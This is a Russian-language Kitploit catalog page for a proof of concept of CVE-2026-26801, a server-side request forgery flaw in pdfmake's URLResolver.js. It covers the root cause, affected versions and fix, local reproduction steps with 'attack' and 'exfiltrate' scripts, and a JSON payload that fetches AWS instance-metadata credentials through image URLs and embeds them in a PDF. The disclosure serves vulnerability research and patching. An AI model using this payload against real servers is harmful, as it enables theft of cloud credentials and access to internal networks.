Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-26801-pdfmake-ssrf — PoC для CVE-2026-26801: SSRF в pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5) | Kitploit
Инструменты/GitHubGitHub/mariopepe/cve-2026-26801-pdfmake-ssrf
Анализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubmariopepe/cve-2026-26801-pdfmake-ssrf

CVE-2026-26801-pdfmake-ssrf

PoC для CVE-2026-26801: SSRF в pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5)

Репозиторий
5 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PoC уязвимости SSRF в pdfmake

Сводка по уязвимости

ПолеЗначение
Пакетpdfmake
Версия>= 0.3.0-beta.2, <= 0.3.5
Исправлено0.3.6
CVECVE-2026-26801
ТипПодделка серверных запросов (SSRF)
Расположениеsrc/URLResolver.js
СерьёзностьВЫСОКАЯ

Первопричина

root@kitploit:~
// URLResolver.js line 3
const response = await fetch(url, { headers });  // NO VALIDATION!

Когда docDefinition содержит URL-адреса в images, attachments или files, pdfmake загружает их без какой-либо проверки:

  • Нет белого/чёрного списка доменов
  • Нет защиты от внутренних IP-адресов (127.0.0.1, 169.254.169.254, 10.x.x.x)
  • Поддерживаются пользовательские заголовки (позволяет обходить аутентификацию)

Воспроизведение

Настройка

root@kitploit:~
npm install

Терминал 1 — Имитация сервера метаданных AWS

root@kitploit:~
npm run metadata

Терминал 2 — Уязвимый PDF-сервер

root@kitploit:~
npm run server

Терминал 3 — Выполнение атаки

Слепой SSRF (доказывает, что сервер совершает исходящие запросы):

root@kitploit:~
npm run attack

Полное чтение SSRF (учётные данные встроены в сгенерированный PDF):

root@kitploit:~
npm run exfiltrate

Ожидаемые результаты

Слепой SSRF (npm run attack)

Вывод сервера метаданных:

root@kitploit:~
[METADATA] GET /latest/meta-data/iam/security-credentials/vulnerable-ec2-role
[METADATA] >>> CREDENTIALS LEAKED! <<<

Это доказывает, что уязвимый сервер совершил исходящий запрос к нашему контролируемому конечному пункту.

Полное чтение SSRF (npm run exfiltrate)

Скрипт атаки генерирует exfiltrated.pdf. Откройте его в любом PDF-просмотрщике, и JSON с учётными данными AWS будет встроен как вложение файла (metadata.json). Это доказывает полную эксфильтрацию данных, а не только слепой SSRF. Атакующий получает фактическое тело ответа внутри PDF.

Реальное влияние

  1. Кража учётных данных AWS/GCP/Azure — доступ к конечным пунктам метаданных облака
  2. Доступ к внутренней сети — доступ к внутренним сервисам
  3. Сканирование портов — перечисление внутренней инфраструктуры
  4. Обход аутентификации — пользовательские заголовки для обхода аутентификации

Полезная нагрузка атаки

root@kitploit:~
{
  "content": ["Hello"],
  "images": {
    "x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  }
}

Отчёт

Полный технический отчёт с историей обнаружения, цепочкой атаки и графиком раскрытия: mariopepe.github.io/cve-2026-26801-pdfmake-ssrf

Скачать инструмент